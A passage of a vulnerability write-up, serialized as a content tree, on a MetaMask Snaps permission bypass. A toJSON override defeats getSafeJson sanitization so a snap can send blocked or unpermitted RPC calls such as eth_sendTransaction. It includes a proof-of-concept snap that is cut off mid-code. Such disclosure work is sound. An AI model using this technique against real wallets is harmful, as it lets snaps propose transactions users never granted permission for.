method:",{"type":27,"tag":207,"props":45761,"children":45762},{"style":220},[45763],{"type":33,"value":45764}," args",{"type":27,"tag":207,"props":45766,"children":45767},{"style":238},[45768],{"type":33,"value":1041},{"type":27,"tag":207,"props":45770,"children":45771},{"style":220},[45772],{"type":33,"value":45559},{"type":27,"tag":207,"props":45774,"children":45775},{"style":238},[45776],{"type":33,"value":1842},{"type":27,"tag":207,"props":45778,"children":45779},{"class":209,"line":4095},[45780],{"type":27,"tag":207,"props":45781,"children":45782},{"style":238},[45783],{"type":33,"value":44449},{"type":27,"tag":207,"props":45785,"children":45786},{"class":209,"line":4103},[45787],{"type":27,"tag":207,"props":45788,"children":45789},{"style":238},[45790],{"type":33,"value":45791}," }),\n",{"type":27,"tag":207,"props":45793,"children":45794},{"class":209,"line":4154},[45795],{"type":27,"tag":207,"props":45796,"children":45797},{"style":238},[45798],{"type":33,"value":45658},{"type":27,"tag":207,"props":45800,"children":45801},{"class":209,"line":4203},[45802,45807,45811,45815,45819,45824,45828,45833],{"type":27,"tag":207,"props":45803,"children":45804},{"style":1335},[45805],{"type":33,"value":45806}," assertStruct",{"type":27,"tag":207,"props":45808,"children":45809},{"style":238},[45810],{"type":33,"value":1343},{"type":27,"tag":207,"props":45812,"children":45813},{"style":220},[45814],{"type":33,"value":1105},{"type":27,"tag":207,"props":45816,"children":45817},{"style":238},[45818],{"type":33,"value":1123},{"type":27,"tag":207,"props":45820,"children":45821},{"style":220},[45822],{"type":33,"value":45823},"JsonStruct",{"type":27,"tag":207,"props":45825,"children":45826},{"style":238},[45827],{"type":33,"value":1123},{"type":27,"tag":207,"props":45829,"children":45830},{"style":1325},[45831],{"type":33,"value":45832},"'Provided value is not JSON-RPC compatible'",{"type":27,"tag":207,"props":45834,"children":45835},{"style":238},[45836],{"type":33,"value":1455},{"type":27,"tag":207,"props":45838,"children":45839},{"class":209,"line":4249},[45840],{"type":27,"tag":207,"props":45841,"children":45842},{"style":238},[45843],{"type":33,"value":451},{"type":27,"tag":36,"props":45845,"children":45846},{},[45847,45849,45854,45856,45862,45863,45869],{"type":33,"value":45848},"This function is called by the ",{"type":27,"tag":84,"props":45850,"children":45852},{"className":45851},[],[45853],{"type":33,"value":45425},{"type":33,"value":45855}," RPC provider, so it can only send methods starting with ",{"type":27,"tag":84,"props":45857,"children":45859},{"className":45858},[],[45860],{"type":33,"value":45861},"wallet_",{"type":33,"value":20411},{"type":27,"tag":84,"props":45864,"children":45866},{"className":45865},[],[45867],{"type":33,"value":45868},"snap_",{"type":33,"value":45870},". In addition, there are some blocked RPC methods that immediately throw an error when encountered.",{"type":27,"tag":36,"props":45872,"children":45873},{},[45874,45876,45881,45883,45888,45890,45896],{"type":33,"value":45875},"On the other hand, the ",{"type":27,"tag":84,"props":45877,"children":45879},{"className":45878},[],[45880],{"type":33,"value":38677},{"type":33,"value":45882}," provider only blocks methods starting with ",{"type":27,"tag":84,"props":45884,"children":45886},{"className":45885},[],[45887],{"type":33,"value":45868},{"type":33,"value":45889}," and the blocked methods. However, it requires the ",{"type":27,"tag":84,"props":45891,"children":45893},{"className":45892},[],[45894],{"type":33,"value":45895},"endowment:ethereum-provider",{"type":33,"value":45897}," permission in the snap manifest.",{"type":27,"tag":26163,"props":45899,"children":45901},{"id":45900},"execution-flow",[45902],{"type":33,"value":45903},"Execution flow",{"type":27,"tag":36,"props":45905,"children":45906},{},[45907,45909,45914,45915,45920,45922,45927,45928,45934],{"type":33,"value":45908},"Both providers (",{"type":27,"tag":84,"props":45910,"children":45912},{"className":45911},[],[45913],{"type":33,"value":45425},{"type":33,"value":1131},{"type":27,"tag":84,"props":45916,"children":45918},{"className":45917},[],[45919],{"type":33,"value":38677},{"type":33,"value":45921},") are built outside the SES container with a ",{"type":27,"tag":84,"props":45923,"children":45925},{"className":45924},[],[45926],{"type":33,"value":38753},{"type":33,"value":13740},{"type":27,"tag":47,"props":45929,"children":45932},{"href":45930,"rel":45931},"https://github.com/MetaMask/snaps/blob/main/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L437",[51],[45933],{"type":33,"value":38637},{"type":33,"value":736},{"type":27,"tag":101,"props":45936,"children":45938},{"className":43182,"code":45937,"language":43184,"meta":7,"style":7}," const request = async (args: RequestArguments) => {\n assertSnapOutboundRequest(args); // or assertEthereumOutboundRequest(args);\n const sanitizedArgs = getSafeJson(args);\n this.notify({ method: 'OutboundRequest' });\n try {\n return await withTeardown(\n originalRequest(sanitizedArgs as unknown as RequestArguments),\n this as any,\n );\n } finally {\n this.notify({ method: 'OutboundResponse' });\n }\n };\n",[45939],{"type":27,"tag":84,"props":45940,"children":45941},{"__ignoreMap":7},[45942,45989,46014,46047,46082,46094,46114,46152,46172,46179,46196,46229,46236],{"type":27,"tag":207,"props":45943,"children":45944},{"class":209,"line":210},[45945,45949,45953,45957,45961,45965,45969,45973,45977,45981,45985],{"type":27,"tag":207,"props":45946,"children":45947},{"style":214},[45948],{"type":33,"value":2333},{"type":27,"tag":207,"props":45950,"children":45951},{"style":1335},[45952],{"type":33,"value":38642},{"type":27,"tag":207,"props":45954,"children":45955},{"style":226},[45956],{"type":33,"value":229},{"type":27,"tag":207,"props":45958,"children":45959},{"style":214},[45960],{"type":33,"value":43615},{"type":27,"tag":207,"props":45962,"children":45963},{"style":238},[45964],{"type":33,"value":686},{"type":27,"tag":207,"props":45966,"children":45967},{"style":220},[45968],{"type":33,"value":1105},{"type":27,"tag":207,"props":45970,"children":45971},{"style":226},[45972],{"type":33,"value":736},{"type":27,"tag":207,"props":45974,"children":45975},{"style":8920},[45976],{"type":33,"value":45483},{"type":27,"tag":207,"props":45978,"children":45979},{"style":238},[45980],{"type":33,"value":2222},{"type":27,"tag":207,"props":45982,"children":45983},{"style":214},[45984],{"type":33,"value":2321},{"type":27,"tag":207,"props":45986,"children":45987},{"style":238},[45988],{"type":33,"value":384},{"type":27,"tag":207,"props":45990,"children":45991},{"class":209,"line":244},[45992,45997,46001,46005,46009],{"type":27,"tag":207,"props":45993,"children":45994},{"style":1335},[45995],{"type":33,"value":45996}," assertSnapOutboundRequest",{"type":27,"tag":207,"props":45998,"children":45999},{"style":238},[46000],{"type":33,"value":1343},{"type":27,"tag":207,"props":46002,"children":46003},{"style":220},[46004],{"type":33,"value":1105},{"type":27,"tag":207,"props":46006,"children":46007},{"style":238},[46008],{"type":33,"value":35619},{"type":27,"tag":207,"props":46010,"children":46011},{"style":4647},[46012],{"type":33,"value":46013},"// or assertEthereumOutboundRequest(args);\n",{"type":27,"tag":207,"props":46015,"children":46016},{"class":209,"line":270},[46017,46021,46026,46030,46035,46039,46043],{"type":27,"tag":207,"props":46018,"children":46019},{"style":214},[46020],{"type":33,"value":38807},{"type":27,"tag":207,"props":46022,"children":46023},{"style":220},[46024],{"type":33,"value":46025}," sanitizedArgs",{"type":27,"tag":207,"props":46027,"children":46028},{"style":226},[46029],{"type":33,"value":229},{"type":27,"tag":207,"props":46031,"children":46032},{"style":1335},[46033],{"type":33,"value":46034}," getSafeJson",{"type":27,"tag":207,"props":46036,"children":46037},{"style":238},[46038],{"type":33,"value":1343},{"type":27,"tag":207,"props":46040,"children":46041},{"style":220},[46042],{"type":33,"value":1105},{"type":27,"tag":207,"props":46044,"children":46045},{"style":238},[46046],{"type":33,"value":1455},{"type":27,"tag":207,"props":46048,"children":46049},{"class":209,"line":296},[46050,46055,46059,46064,46068,46072,46077],{"type":27,"tag":207,"props":46051,"children":46052},{"style":214},[46053],{"type":33,"value":46054}," this",{"type":27,"tag":207,"props":46056,"children":46057},{"style":238},[46058],{"type":33,"value":1041},{"type":27,"tag":207,"props":46060,"children":46061},{"style":1335},[46062],{"type":33,"value":46063},"notify",{"type":27,"tag":207,"props":46065,"children":46066},{"style":238},[46067],{"type":33,"value":38758},{"type":27,"tag":207,"props":46069,"children":46070},{"style":220},[46071],{"type":33,"value":38763},{"type":27,"tag":207,"props":46073,"children":46074},{"style":1325},[46075],{"type":33,"value":46076}," 'OutboundRequest'",{"type":27,"tag":207,"props":46078,"children":46079},{"style":238},[46080],{"type":33,"value":46081}," });\n",{"type":27,"tag":207,"props":46083,"children":46084},{"class":209,"line":445},[46085,46090],{"type":27,"tag":207,"props":46086,"children":46087},{"style":376},[46088],{"type":33,"value":46089}," try",{"type":27,"tag":207,"props":46091,"children":46092},{"style":238},[46093],{"type":33,"value":384},{"type":27,"tag":207,"props":46095,"children":46096},{"class":209,"line":867},[46097,46101,46105,46110],{"type":27,"tag":207,"props":46098,"children":46099},{"style":376},[46100],{"type":33,"value":23019},{"type":27,"tag":207,"props":46102,"children":46103},{"style":376},[46104],{"type":33,"value":43461},{"type":27,"tag":207,"props":46106,"children":46107},{"style":1335},[46108],{"type":33,"value":46109}," withTeardown",{"type":27,"tag":207,"props":46111,"children":46112},{"style":238},[46113],{"type":33,"value":9090},{"type":27,"tag":207,"props":46115,"children":46116},{"class":209,"line":892},[46117,46122,46126,46131,46135,46140,46144,46148],{"type":27,"tag":207,"props":46118,"children":46119},{"style":1335},[46120],{"type":33,"value":46121}," originalRequest",{"type":27,"tag":207,"props":46123,"children":46124},{"style":238},[46125],{"type":33,"value":1343},{"type":27,"tag":207,"props":46127,"children":46128},{"style":220},[46129],{"type":33,"value":46130},"sanitizedArgs",{"type":27,"tag":207,"props":46132,"children":46133},{"style":376},[46134],{"type":33,"value":16108},{"type":27,"tag":207,"props":46136,"children":46137},{"style":8920},[46138],{"type":33,"value":46139}," unknown",{"type":27,"tag":207,"props":46141,"children":46142},{"style":376},[46143],{"type":33,"value":16108},{"type":27,"tag":207,"props":46145,"children":46146},{"style":8920},[46147],{"type":33,"value":45483},{"type":27,"tag":207,"props":46149,"children":46150},{"style":238},[46151],{"type":33,"value":14018},{"type":27,"tag":207,"props":46153,"children":46154},{"class":209,"line":1475},[46155,46160,46164,46168],{"type":27,"tag":207,"props":46156,"children":46157},{"style":214},[46158],{"type":33,"value":46159}," this",{"type":27,"tag":207,"props":46161,"children":46162},{"style":376},[46163],{"type":33,"value":16108},{"type":27,"tag":207,"props":46165,"children":46166},{"style":8920},[46167],{"type":33,"value":17635},{"type":27,"tag":207,"props":46169,"children":46170},{"style":238},[46171],{"type":33,"value":1842},{"type":27,"tag":207,"props":46173,"children":46174},{"class":209,"line":2065},[46175],{"type":27,"tag":207,"props":46176,"children":46177},{"style":238},[46178],{"type":33,"value":15026},{"type":27,"tag":207,"props":46180,"children":46181},{"class":209,"line":2092},[46182,46187,46192],{"type":27,"tag":207,"props":46183,"children":46184},{"style":238},[46185],{"type":33,"value":46186}," } ",{"type":27,"tag":207,"props":46188,"children":46189},{"style":376},[46190],{"type":33,"value":46191},"finally",{"type":27,"tag":207,"props":46193,"children":46194},{"style":238},[46195],{"type":33,"value":384},{"type":27,"tag":207,"props":46197,"children":46198},{"class":209,"line":2130},[46199,46204,46208,46212,46216,46220,46225],{"type":27,"tag":207,"props":46200,"children":46201},{"style":214},[46202],{"type":33,"value":46203}," this",{"type":27,"tag":207,"props":46205,"children":46206},{"style":238},[46207],{"type":33,"value":1041},{"type":27,"tag":207,"props":46209,"children":46210},{"style":1335},[46211],{"type":33,"value":46063},{"type":27,"tag":207,"props":46213,"children":46214},{"style":238},[46215],{"type":33,"value":38758},{"type":27,"tag":207,"props":46217,"children":46218},{"style":220},[46219],{"type":33,"value":38763},{"type":27,"tag":207,"props":46221,"children":46222},{"style":1325},[46223],{"type":33,"value":46224}," 'OutboundResponse'",{"type":27,"tag":207,"props":46226,"children":46227},{"style":238},[46228],{"type":33,"value":46081},{"type":27,"tag":207,"props":46230,"children":46231},{"class":209,"line":2168},[46232],{"type":27,"tag":207,"props":46233,"children":46234},{"style":238},[46235],{"type":33,"value":19941},{"type":27,"tag":207,"props":46237,"children":46238},{"class":209,"line":4095},[46239],{"type":27,"tag":207,"props":46240,"children":46241},{"style":238},[46242],{"type":33,"value":46243}," };\n",{"type":27,"tag":36,"props":46245,"children":46246},{},[46247,46249,46254,46256,46261],{"type":33,"value":46248},"In particular, this function is from the ",{"type":27,"tag":84,"props":46250,"children":46252},{"className":46251},[],[46253],{"type":33,"value":45425},{"type":33,"value":46255}," provider, but the only thing that changes between this and ",{"type":27,"tag":84,"props":46257,"children":46259},{"className":46258},[],[46260],{"type":33,"value":38677},{"type":33,"value":46262}," is the assert function in the first line.",{"type":27,"tag":36,"props":46264,"children":46265},{},[46266],{"type":33,"value":46267},"As we can see in the code, the execution flow follows this pattern:",{"type":27,"tag":12719,"props":46269,"children":46270},{},[46271,46283,46288],{"type":27,"tag":1232,"props":46272,"children":46273},{},[46274,46276,46281],{"type":33,"value":46275},"Assert if ",{"type":27,"tag":84,"props":46277,"children":46279},{"className":46278},[],[46280],{"type":33,"value":1105},{"type":33,"value":46282}," are valid",{"type":27,"tag":1232,"props":46284,"children":46285},{},[46286],{"type":33,"value":46287},"getSafeJson to get sanitizedArgs",{"type":27,"tag":1232,"props":46289,"children":46290},{},[46291],{"type":33,"value":46292},"originalRequest(sanitizedArgs)",{"type":27,"tag":36,"props":46294,"children":46295},{},[46296,46298,46304],{"type":33,"value":46297},"Obs: ",{"type":27,"tag":84,"props":46299,"children":46301},{"className":46300},[],[46302],{"type":33,"value":46303},"originalRequest",{"type":33,"value":46305}," makes the RPC call to metamask service worker",{"type":27,"tag":58,"props":46307,"children":46309},{"id":46308},"safe-json-exploit",[46310],{"type":33,"value":46311},"Safe JSON Exploit",{"type":27,"tag":36,"props":46313,"children":46314},{},[46315,46317,46323,46325,46330,46332,46338],{"type":33,"value":46316},"As we dug further into the",{"type":27,"tag":84,"props":46318,"children":46320},{"className":46319},[],[46321],{"type":33,"value":46322},"getSafeJson",{"type":33,"value":46324}," function (defined in ",{"type":27,"tag":84,"props":46326,"children":46328},{"className":46327},[],[46329],{"type":33,"value":44546},{"type":33,"value":46331}," package) we discovered the following ",{"type":27,"tag":47,"props":46333,"children":46336},{"href":46334,"rel":46335},"https://github.com/MetaMask/utils/blob/7f0116d4d853d85319d200c503a2f9abc390f1d3/src/json.ts#L72",[51],[46337],{"type":33,"value":84},{"type":33,"value":736},{"type":27,"tag":101,"props":46340,"children":46342},{"className":1571,"code":46341,"language":1570,"meta":7,"style":7},"export const JsonStruct = coerce(UnsafeJsonStruct, any(), (value) => {\n assertStruct(value, UnsafeJsonStruct);\n return JSON.parse(\n JSON.stringify(value, (propKey, propValue) => {\n // Strip __proto__ and constructor properties to prevent prototype pollution.\n if (propKey === '__proto__' || propKey === 'constructor') {\n return undefined;\n }\n return propValue;\n }),\n );\n});\n",[46343],{"type":27,"tag":84,"props":46344,"children":46345},{"__ignoreMap":7},[46346,46410,46437,46462,46517,46525,46572,46588,46595,46612,46619,46626],{"type":27,"tag":207,"props":46347,"children":46348},{"class":209,"line":210},[46349,46353,46358,46363,46367,46372,46376,46381,46385,46389,46394,46398,46402,46406],{"type":27,"tag":207,"props":46350,"children":46351},{"style":376},[46352],{"type":33,"value":45456},{"type":27,"tag":207,"props":46354,"children":46355},{"style":214},[46356],{"type":33,"value":46357}," const",{"type":27,"tag":207,"props":46359,"children":46360},{"style":220},[46361],{"type":33,"value":46362}," JsonStruct",{"type":27,"tag":207,"props":46364,"children":46365},{"style":226},[46366],{"type":33,"value":229},{"type":27,"tag":207,"props":46368,"children":46369},{"style":1335},[46370],{"type":33,"value":46371}," coerce",{"type":27,"tag":207,"props":46373,"children":46374},{"style":238},[46375],{"type":33,"value":1343},{"type":27,"tag":207,"props":46377,"children":46378},{"style":220},[46379],{"type":33,"value":46380},"UnsafeJsonStruct",{"type":27,"tag":207,"props":46382,"children":46383},{"style":238},[46384],{"type":33,"value":1123},{"type":27,"tag":207,"props":46386,"children":46387},{"style":1335},[46388],{"type":33,"value":23988},{"type":27,"tag":207,"props":46390,"children":46391},{"style":238},[46392],{"type":33,"value":46393},"(), (",{"type":27,"tag":207,"props":46395,"children":46396},{"style":220},[46397],{"type":33,"value":4196},{"type":27,"tag":207,"props":46399,"children":46400},{"style":238},[46401],{"type":33,"value":2222},{"type":27,"tag":207,"props":46403,"children":46404},{"style":214},[46405],{"type":33,"value":2321},{"type":27,"tag":207,"props":46407,"children":46408},{"style":238},[46409],{"type":33,"value":384},{"type":27,"tag":207,"props":46411,"children":46412},{"class":209,"line":244},[46413,46417,46421,46425,46429,46433],{"type":27,"tag":207,"props":46414,"children":46415},{"style":1335},[46416],{"type":33,"value":45806},{"type":27,"tag":207,"props":46418,"children":46419},{"style":238},[46420],{"type":33,"value":1343},{"type":27,"tag":207,"props":46422,"children":46423},{"style":220},[46424],{"type":33,"value":4196},{"type":27,"tag":207,"props":46426,"children":46427},{"style":238},[46428],{"type":33,"value":1123},{"type":27,"tag":207,"props":46430,"children":46431},{"style":220},[46432],{"type":33,"value":46380},{"type":27,"tag":207,"props":46434,"children":46435},{"style":238},[46436],{"type":33,"value":1455},{"type":27,"tag":207,"props":46438,"children":46439},{"class":209,"line":270},[46440,46445,46449,46453,46458],{"type":27,"tag":207,"props":46441,"children":46442},{"style":376},[46443],{"type":33,"value":46444}," return",{"type":27,"tag":207,"props":46446,"children":46447},{"style":220},[46448],{"type":33,"value":44777},{"type":27,"tag":207,"props":46450,"children":46451},{"style":238},[46452],{"type":33,"value":1041},{"type":27,"tag":207,"props":46454,"children":46455},{"style":1335},[46456],{"type":33,"value":46457},"parse",{"type":27,"tag":207,"props":46459,"children":46460},{"style":238},[46461],{"type":33,"value":9090},{"type":27,"tag":207,"props":46463,"children":46464},{"class":209,"line":296},[46465,46470,46474,46479,46483,46487,46491,46496,46500,46505,46509,46513],{"type":27,"tag":207,"props":46466,"children":46467},{"style":220},[46468],{"type":33,"value":46469}," JSON",{"type":27,"tag":207,"props":46471,"children":46472},{"style":238},[46473],{"type":33,"value":1041},{"type":27,"tag":207,"props":46475,"children":46476},{"style":1335},[46477],{"type":33,"value":46478},"stringify",{"type":27,"tag":207,"props":46480,"children":46481},{"style":238},[46482],{"type":33,"value":1343},{"type":27,"tag":207,"props":46484,"children":46485},{"style":220},[46486],{"type":33,"value":4196},{"type":27,"tag":207,"props":46488,"children":46489},{"style":238},[46490],{"type":33,"value":16099},{"type":27,"tag":207,"props":46492,"children":46493},{"style":220},[46494],{"type":33,"value":46495},"propKey",{"type":27,"tag":207,"props":46497,"children":46498},{"style":238},[46499],{"type":33,"value":1123},{"type":27,"tag":207,"props":46501,"children":46502},{"style":220},[46503],{"type":33,"value":46504},"propValue",{"type":27,"tag":207,"props":46506,"children":46507},{"style":238},[46508],{"type":33,"value":2222},{"type":27,"tag":207,"props":46510,"children":46511},{"style":214},[46512],{"type":33,"value":2321},{"type":27,"tag":207,"props":46514,"children":46515},{"style":238},[46516],{"type":33,"value":384},{"type":27,"tag":207,"props":46518,"children":46519},{"class":209,"line":445},[46520],{"type":27,"tag":207,"props":46521,"children":46522},{"style":4647},[46523],{"type":33,"value":46524}," // Strip __proto__ and constructor properties to prevent prototype pollution.\n",{"type":27,"tag":207,"props":46526,"children":46527},{"class":209,"line":867},[46528,46533,46537,46541,46545,46550,46554,46559,46563,46568],{"type":27,"tag":207,"props":46529,"children":46530},{"style":376},[46531],{"type":33,"value":46532}," if",{"type":27,"tag":207,"props":46534,"children":46535},{"style":238},[46536],{"type":33,"value":686},{"type":27,"tag":207,"props":46538,"children":46539},{"style":220},[46540],{"type":33,"value":46495},{"type":27,"tag":207,"props":46542,"children":46543},{"style":226},[46544],{"type":33,"value":38682},{"type":27,"tag":207,"props":46546,"children":46547},{"style":1325},[46548],{"type":33,"value":46549}," '__proto__'",{"type":27,"tag":207,"props":46551,"children":46552},{"style":226},[46553],{"type":33,"value":30971},{"type":27,"tag":207,"props":46555,"children":46556},{"style":220},[46557],{"type":33,"value":46558}," propKey",{"type":27,"tag":207,"props":46560,"children":46561},{"style":226},[46562],{"type":33,"value":38682},{"type":27,"tag":207,"props":46564,"children":46565},{"style":1325},[46566],{"type":33,"value":46567}," 'constructor'",{"type":27,"tag":207,"props":46569,"children":46570},{"style":238},[46571],{"type":33,"value":1424},{"type":27,"tag":207,"props":46573,"children":46574},{"class":209,"line":892},[46575,46579,46584],{"type":27,"tag":207,"props":46576,"children":46577},{"style":376},[46578],{"type":33,"value":23019},{"type":27,"tag":207,"props":46580,"children":46581},{"style":214},[46582],{"type":33,"value":46583}," undefined",{"type":27,"tag":207,"props":46585,"children":46586},{"style":238},[46587],{"type":33,"value":241},{"type":27,"tag":207,"props":46589,"children":46590},{"class":209,"line":1475},[46591],{"type":27,"tag":207,"props":46592,"children":46593},{"style":238},[46594],{"type":33,"value":19941},{"type":27,"tag":207,"props":46596,"children":46597},{"class":209,"line":2065},[46598,46603,46608],{"type":27,"tag":207,"props":46599,"children":46600},{"style":376},[46601],{"type":33,"value":46602}," return",{"type":27,"tag":207,"props":46604,"children":46605},{"style":220},[46606],{"type":33,"value":46607}," propValue",{"type":27,"tag":207,"props":46609,"children":46610},{"style":238},[46611],{"type":33,"value":241},{"type":27,"tag":207,"props":46613,"children":46614},{"class":209,"line":2092},[46615],{"type":27,"tag":207,"props":46616,"children":46617},{"style":238},[46618],{"type":33,"value":45791},{"type":27,"tag":207,"props":46620,"children":46621},{"class":209,"line":2130},[46622],{"type":27,"tag":207,"props":46623,"children":46624},{"style":238},[46625],{"type":33,"value":45658},{"type":27,"tag":207,"props":46627,"children":46628},{"class":209,"line":2168},[46629],{"type":27,"tag":207,"props":46630,"children":46631},{"style":238},[46632],{"type":33,"value":42591},{"type":27,"tag":36,"props":46634,"children":46635},{},[46636,46638,46644,46646,46651,46653,46659,46661,46667],{"type":33,"value":46637},"The function performs a ",{"type":27,"tag":84,"props":46639,"children":46641},{"className":46640},[],[46642],{"type":33,"value":46643},"JSON.parse(JSON.stringify(value))",{"type":33,"value":46645}," in the argument sent to ",{"type":27,"tag":84,"props":46647,"children":46649},{"className":46648},[],[46650],{"type":33,"value":46322},{"type":33,"value":46652},". This specific function is how we found a way to exploit the assertion limitations. The bypass is made by setting a ",{"type":27,"tag":84,"props":46654,"children":46656},{"className":46655},[],[46657],{"type":33,"value":46658},"toJSON",{"type":33,"value":46660}," function in a legit ",{"type":27,"tag":84,"props":46662,"children":46664},{"className":46663},[],[46665],{"type":33,"value":46666},"snap.request",{"type":33,"value":46668}," argument:",{"type":27,"tag":12719,"props":46670,"children":46671},{},[46672,46677,46682],{"type":27,"tag":1232,"props":46673,"children":46674},{},[46675],{"type":33,"value":46676},"assertSnapOutboundRequest(args) -> pass the assertion",{"type":27,"tag":1232,"props":46678,"children":46679},{},[46680],{"type":33,"value":46681},"sanitizedArgs = getSafeJson(args) -> toJSON returns a malicious object",{"type":27,"tag":1232,"props":46683,"children":46684},{},[46685],{"type":33,"value":46686},"originalRequest(sanitizedArgs) -> forwards the malicious object",{"type":27,"tag":36,"props":46688,"children":46689},{},[46690],{"type":33,"value":46691},"The assertion bypass can be useful on two occasions:",{"type":27,"tag":12719,"props":46693,"children":46694},{},[46695,46700],{"type":27,"tag":1232,"props":46696,"children":46697},{},[46698],{"type":33,"value":46699},"forward blocked RPC methods",{"type":27,"tag":1232,"props":46701,"children":46702},{},[46703,46705,46710,46712,46718,46720,46725],{"type":33,"value":46704},"Making requests in ",{"type":27,"tag":84,"props":46706,"children":46708},{"className":46707},[],[46709],{"type":33,"value":46666},{"type":33,"value":46711}," that were only supposed to be done within ",{"type":27,"tag":84,"props":46713,"children":46715},{"className":46714},[],[46716],{"type":33,"value":46717},"ethereum.request",{"type":33,"value":46719}," (with ",{"type":27,"tag":84,"props":46721,"children":46723},{"className":46722},[],[46724],{"type":33,"value":45895},{"type":33,"value":46726}," enabled).",{"type":27,"tag":36,"props":46728,"children":46729},{},[46730],{"type":33,"value":46731},"This particular vulnerability allows the snap to perform ethereum requests without permissions.",{"type":27,"tag":58,"props":46733,"children":46734},{"id":12945},[46735],{"type":33,"value":12948},{"type":27,"tag":36,"props":46737,"children":46738},{},[46739],{"type":33,"value":46740},"The bypass we described may be used to mislead the allowed permissions of the snap. This can cause the snap installation confirmation popup not to display the actual permissions of the snap. This exploit allows the snap to unexpectedly propose malicious transactions to the user, which shouldn't be possible, even with permissions according to the documentation.",{"type":27,"tag":36,"props":46742,"children":46743},{},[46744],{"type":27,"tag":126,"props":46745,"children":46747},{"alt":7,"src":46746},"/posts/metamask-snaps/note.png",[],{"type":27,"tag":58,"props":46749,"children":46751},{"id":46750},"proof-of-concept",[46752],{"type":33,"value":42085},{"type":27,"tag":36,"props":46754,"children":46755},{},[46756,46758,46763,46765,46770,46772,46778],{"type":33,"value":46757},"To demonstrate the issue, we created a snap without the ",{"type":27,"tag":84,"props":46759,"children":46761},{"className":46760},[],[46762],{"type":33,"value":45895},{"type":33,"value":46764}," permission, and used the ",{"type":27,"tag":84,"props":46766,"children":46768},{"className":46767},[],[46769],{"type":33,"value":45425},{"type":33,"value":46771}," interface to call ",{"type":27,"tag":84,"props":46773,"children":46775},{"className":46774},[],[46776],{"type":33,"value":46777},"eth_sendTransaction",{"type":33,"value":46779},". According to the documentation, this shouldn't be possible:",{"type":27,"tag":101,"props":46781,"children":46783},{"className":1571,"code":46782,"language":1570,"meta":7,"style":7},"import { OnRpcRequestHandler } from '@metamask/snaps-types';\n\n\nfunction jsonExploit(){\n let x = [] as any\n\n x.method = \"snap_dialog\"\n\n x.toJSON = () => {\n return {\n method: \"eth_requestAccounts\",\n params: []\n }\n }\n\n return snap.request(x)\n\n}\n\nfunction transactionExploit(){\n let x = [] as any\n\n x.method = \"snap_dialog\"\n\n x.toJSON = () => {\n return {\n method: \"eth_sendTransaction\",\n params: [{\n from: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\", // change this to your address\n to: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\",\n value: \"0x1\",\n }]\n }\n }\n\n return snap.request(x);\n}\n\nexport const onRpcRequest: OnRpcRequestHandler = ({ origin, request }) => {\n\n switch (request.method) {\n case 'json':\n return jsonExploit();\n case 'transaction':\n return transactionExploit();\n default:\n throw new Error('Method not found.');\n }\n};\n",[46784],{"type":27,"tag":84,"props":46785,"children":46786},{"__ignoreMap":7},[46787,46820,46827,46834,46851,46880,46887,46912,46919,46950,46961,46978,46991,46998,47005,47012,47044,47051,47058,47065,47081,47108,47115,47138,47145,47176,47187,47203,47215,47236,47251,47268,47276,47283,47290,47297,47328,47335,47342,47402,47409,47437,47454,47469,47485,47500,47512,47542,47549],{"type":27,"tag":207,"props":46788,"children":46789},{"class":209,"line":210},[46790,46794,46798,46803,46807,46811,46816],{"type":27,"tag":207,"props":46791,"children":46792},{"style":376},[46793],{"type":33,"value":26754},{"type":27,"tag":207,"props":46795,"children":46796},{"style":238},[46797],{"type":33,"value":16862},{"type":27,"tag":207,"props":46799,"children":46800},{"style":220},[46801],{"type":33,"value":46802},"OnRpcRequestHandler",{"type":27,"tag":207,"props":46804,"children":46805},{"style":238},[46806],{"type":33,"value":43452},{"type":27,"tag":207,"props":46808,"children":46809},{"style":376},[46810],{"type":33,"value":26744},{"type":27,"tag":207,"props":46812,"children":46813},{"style":1325},[46814],{"type":33,"value":46815}," '@metamask/snaps-types'",{"type":27,"tag":207,"props":46817,"children":46818},{"style":238},[46819],{"type":33,"value":241},{"type":27,"tag":207,"props":46821,"children":46822},{"class":209,"line":244},[46823],{"type":27,"tag":207,"props":46824,"children":46825},{"emptyLinePlaceholder":19},[46826],{"type":33,"value":2062},{"type":27,"tag":207,"props":46828,"children":46829},{"class":209,"line":270},[46830],{"type":27,"tag":207,"props":46831,"children":46832},{"emptyLinePlaceholder":19},[46833],{"type":33,"value":2062},{"type":27,"tag":207,"props":46835,"children":46836},{"class":209,"line":296},[46837,46841,46846],{"type":27,"tag":207,"props":46838,"children":46839},{"style":214},[46840],{"type":33,"value":38637},{"type":27,"tag":207,"props":46842,"children":46843},{"style":1335},[46844],{"type":33,"value":46845}," jsonExploit",{"type":27,"tag":207,"props":46847,"children":46848},{"style":238},[46849],{"type":33,"value":46850},"(){\n",{"type":27,"tag":207,"props":46852,"children":46853},{"class":209,"line":445},[46854,46858,46862,46866,46871,46875],{"type":27,"tag":207,"props":46855,"children":46856},{"style":214},[46857],{"type":33,"value":425},{"type":27,"tag":207,"props":46859,"children":46860},{"style":220},[46861],{"type":33,"value":26335},{"type":27,"tag":207,"props":46863,"children":46864},{"style":226},[46865],{"type":33,"value":229},{"type":27,"tag":207,"props":46867,"children":46868},{"style":238},[46869],{"type":33,"value":46870}," [] ",{"type":27,"tag":207,"props":46872,"children":46873},{"style":376},[46874],{"type":33,"value":16122},{"type":27,"tag":207,"props":46876,"children":46877},{"style":8920},[46878],{"type":33,"value":46879}," any\n",{"type":27,"tag":207,"props":46881,"children":46882},{"class":209,"line":867},[46883],{"type":27,"tag":207,"props":46884,"children":46885},{"emptyLinePlaceholder":19},[46886],{"type":33,"value":2062},{"type":27,"tag":207,"props":46888,"children":46889},{"class":209,"line":892},[46890,46895,46899,46903,46907],{"type":27,"tag":207,"props":46891,"children":46892},{"style":220},[46893],{"type":33,"value":46894}," x",{"type":27,"tag":207,"props":46896,"children":46897},{"style":238},[46898],{"type":33,"value":1041},{"type":27,"tag":207,"props":46900,"children":46901},{"style":220},[46902],{"type":33,"value":45559},{"type":27,"tag":207,"props":46904,"children":46905},{"style":226},[46906],{"type":33,"value":229},{"type":27,"tag":207,"props":46908,"children":46909},{"style":1325},[46910],{"type":33,"value":46911}," 